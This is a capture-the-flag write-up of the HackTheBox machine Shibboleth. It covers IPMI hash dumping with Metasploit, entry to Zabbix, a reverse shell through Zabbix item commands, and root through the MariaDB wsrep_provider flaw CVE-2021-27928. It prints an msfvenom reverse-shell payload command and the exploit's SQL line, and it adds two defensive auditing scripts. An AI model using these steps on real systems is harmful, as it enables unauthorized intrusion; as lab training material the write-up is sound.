HackTheBox — Shibboleth Writeup
So this is my write-up on one of the HackTheBox machines called Shibboleth. Let’s go!

Initial
As usual, first off, we start with an Nmap scan.

Okay, only port 80 is open. The web server version is Apache 2.4.41 (not interesting at all). Is there another uncommon port that is open? Or do we have to do some port knocking? We will see. Let’s try to scan again.

Hmm.. a UDP scan perhaps?

I found interesting stuff about that port on https://book.hacktricks.xyz/pentesting/623-udp-ipmi. Maybe I will check on it later.
Let’s begin enumerating the web.

A beautiful-looking web page.

There’s a “contact us” form that, for once, is not a dummy and submits its data to the contact.php file. So now we know the website is based on PHP.
I tried to submit random stuff, and I got this error message
Error: Unable to load the “PHP Email Form” Library!
I wonder if it’s something.
Let’s do some directory brute-forcing and try to find subdomains.


So we got some directories and a file called changelog.txt. There is nothing interesting in /assets. In /forms, we got the contact.php we had interacted with earlier. There is nothing interesting in changelog.txt either.
Checking the subdomains we found a Zabbix login page.

Just to be sure, I will try to run gobuster on those three subdomains I found. In the meantime, let's google Zabbix. Wikipedia says that
Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
Googling for exploits, I see these two potential exploits to bypass the authentication process.

But I’m sure it won’t work because it seems like we are using Zabbix version 5.0.

I got nothing on that Zabbix service. Let’s step back and check on that service on port 623. Summarizing from https://book.hacktricks.xyz/pentesting/623-udp-ipmi, port 623 is the default port for IPMI, the Intelligent Platform Management Interface. It is implemented by Baseboard Management Controllers (BMCs), which are a type of embedded computer used to provide out-of-band monitoring for desktops and servers.
There are vulnerabilities in IPMI that let us bypass authentication. First, we need to discover which version of IPMI the server is using. We can do that with this Metasploit module:
use auxiliary/scanner/ipmi/ipmi_version

So it’s IPMI 2.0. It should be vulnerable.
Then, we can verify if it’s vulnerable or not by using this:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
Set the options and run it. Metasploit reports that the service is indeed vulnerable.

The next step is to abuse it using ipmitool. (I’m just following the steps from HackTricks, by the way.)
The default credentials from the HackTricks website don’t work in our case.

Reading the web again, it says that
Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password
So perhaps our IPMI is from a different brand. It’s also noted on the HackTricks website that we first need to find a valid user.
So any password will work and we just need to find the right user. Let’s find a user list for IPMI. After googling, I found this image from Rapid7.

Let’s try the usernames one by one. Oh, the first one works!

Foothold
We know the right credentials to execute commands with the ipmitool. Now, we need to find the right command to leverage this vulnerability.
Reading further on book.hacktricks.xyz, it says that
Basically, you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back. Yeah, as amazing as it sounds. And there is a metasploit module for testing this (you can select the output in John or Hashcat format):
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
So yeah, we know that only a user called Administrator exists, so we can dump the hash for this user. Maybe we can use this user to log in to the Zabbix service.

Just like that, we got the Administrator user password hash. Looking at https://hashcat.net/wiki/doku.php?id=example_hashes, I can see that the hash we got is similar to IPMI2 RAKP HMAC-SHA1 (ID 7300). It’s cracking time.

Cracked! Let’s try to log in to the Zabbix dashboard.

We are in.
Now, how do we leverage this position? Can we execute commands with Zabbix? I can’t find any relevant CVEs, but after googling for a bit I found this post on StackOverflow: https://stackoverflow.com/questions/24222086/how-to-run-command-on-zabbix-agents
It says that we can run commands from the server directly from a new item. So we have to create a new item.
First, set:
EnableRemoteCommands=1
in the agent conf file (for all of your agents). To enable this feature.
I don’t know where this agent conf file is, so I will ignore it for now.
Now, how do we create a new item? After wandering around and looking at everything for a while, I can see that there’s an “Items” menu under Configuration > Hosts.

Clicking on it, we can see a “Create Item” button on the top right.

I just followed every step in that StackOverflow post and edited the command into a reverse shell command. We add that item.

After adding it, we can execute it!

Start a listener, execute it, and BOOM, we are inside.

But the shell dropped immediately. I tried again and stabilized the shell immediately.

Sadly, it’s still not working, so I have to think of another way.
I tried for a while to get a proper shell with a bunch of payloads, but none worked. It just wasn’t stable. That made me look into the Zabbix documentation, specifically the system.run command: https://www.zabbix.com/documentation/current/en/manual/config/items/itemtypes/zabbix_agent
It turns out we can specify a second parameter to the command, wait or nowait.

I tried to run it again, this time adding nowait in the second argument.

Finally, we got a stable shell. Stabilize the shell, and let’s get the user!
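From the defender's side, the question this foothold raises is whether an agent accepts system.run items at all. The following is an added example, not part of the original write-up or of Zabbix itself: it audits the text of an agent configuration. The sample config is constructed, and the rule semantics (AllowKey/DenyKey evaluated in file order with the first match winning, system.run denied when nothing matches, EnableRemoteCommands treated as a rule for system.run[*]) are assumptions based on the Zabbix 5.0 agent documentation.

```python
import re

# Constructed sample zabbix_agentd.conf; not taken from the box in this write-up.
SAMPLE_CONF = """\
# constructed sample
Server=127.0.0.1
EnableRemoteCommands=1
LogRemoteCommands=0
"""

def parse_conf(text):
    """Return (name, value) pairs in file order, skipping comments and blanks."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            name, value = line.split("=", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs

def wildcard_match(pattern, key):
    """Match an item-key pattern in which '*' stands for any run of characters."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, key) is not None

def remote_commands_allowed(text, probe="system.run[id,nowait]"):
    """Apply the key rules in file order (first match wins, assumed semantics).
    EnableRemoteCommands is treated as an allow/deny rule for system.run[*]."""
    for name, value in parse_conf(text):
        if name == "EnableRemoteCommands":
            allow, pattern = value == "1", "system.run[*]"
        elif name in ("AllowKey", "DenyKey"):
            allow, pattern = name == "AllowKey", value
        else:
            continue
        if wildcard_match(pattern, probe):
            return allow
    return False  # assumed default: system.run is denied when no rule matches

def audit(text):
    """Return human-readable findings for one agent configuration."""
    findings = []
    if remote_commands_allowed(text):
        findings.append("system.run is permitted: item creators can run commands")
        if dict(parse_conf(text)).get("LogRemoteCommands", "0") != "1":
            findings.append("LogRemoteCommands is off: executions are not logged")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print("[!]", finding)
```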

Getting Other User
So, there’s only one other user on this machine called ipmi-svc.

I immediately tried using the password we cracked earlier from the IPMI service. It turns out it works!

That was easy. Grab the user flag, and let’s get the root!
Getting Root
I tried to run sudo -l but it seems like we can’t run sudo.

Let’s first just try to find everything we have access to.
find / -group ipmi-svc 2>/dev/null | tee results.txt

Okay, it seems like we have access to lots of things, but the one that interests me the most is the zabbix_server.conf one, so let’s check on that.
Reading through those Zabbix server configuration files, I found uncommented database credentials.

Let’s keep those credentials and keep on reading.
I found nothing more interesting other than those DB credentials. Let’s try to access the DB. We have MySQL, perhaps we can try with that.

Wow, we are actually in.

Let’s enumerate it.

More hashes, and I know we most likely can’t crack this one since it’s bcrypt with ten iterations.
Hm… what can we do with these database credentials? Is it a rabbit hole?
.
.
I found nothing. There must be something to do with these database credentials. I tried to get into the database again. I realized that the version of MariaDB is quite outdated.

Googling for a bit, I found this from Rapid7.

Surely, it’s suitable for our case. Searching for that CVE number, I immediately found this GitHub page https://github.com/Al1ex/CVE-2021-27928.
I followed the steps there.
First, generate a reverse shell executable.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o exploit.so

Secondly, start a listener.

Thirdly, transfer the exploit we generated.

Finally, execute the exploit.
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="[path_to_exploit]";

ROOTED!
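The last step above is a runtime change of wsrep_provider, which leaves a recognisable statement behind if statement logging is enabled. The following is an added example, not from the original write-up or the linked repository: it scans logged statements for that change and reports any provider value outside an allowlist. The log lines are constructed, and the allowlist entries and the presence of a statement log are assumptions.

```python
import re

# Provider values treated as expected. Both entries are assumptions for this
# example: "none" (Galera disabled) and a typical packaged Galera library path.
ALLOWED_PROVIDERS = {"none", "/usr/lib/galera/libgalera_smm.so"}

# Matches SET GLOBAL wsrep_provider=... and SET @@GLOBAL.wsrep_provider=...
SET_PROVIDER = re.compile(
    r"\bSET\b.*?(?:\bGLOBAL\s+|@@GLOBAL\.)wsrep_provider\s*=\s*"
    r"""(['"]?)([^'";,\s]+)\1""",
    re.IGNORECASE,
)

# Constructed statement-log lines (connection id, command, statement).
SAMPLE_LOG = [
    '12 Query\tSET GLOBAL wsrep_provider="/tmp/exploit.so"',
    "13 Query\tset @@global.wsrep_provider = 'none'",
    "14 Query\tSELECT @@wsrep_provider",
    "15 Query\tSET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
]

def suspicious_provider_changes(lines, allowed=ALLOWED_PROVIDERS):
    """Return (line_number, provider_value) for every runtime change of
    wsrep_provider to a value outside the allowlist."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = SET_PROVIDER.search(line)
        if match and match.group(2) not in allowed:
            hits.append((number, match.group(2)))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_provider_changes(SAMPLE_LOG):
        print(f"[!] line {number}: wsrep_provider set to {value}")
```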
Final Thoughts
I like this machine. Exploiting the IPMI service was new to me. But it wasn’t hard with all of the resources available such as https://book.hacktricks.xyz/.
Gaining the foothold was kind of frustrating. I spent a lot of time trying to make the shell stable.
This box reminds me to “always ENUMERATE EVERYTHING.” Take a look at the version of EVERYTHING. Even try the UDP scan when you find nothing on the SYN scan. Every little piece of information is important.
Overall, a very good box indeed.
Thank you for reading this write-up! Stay safe everyone!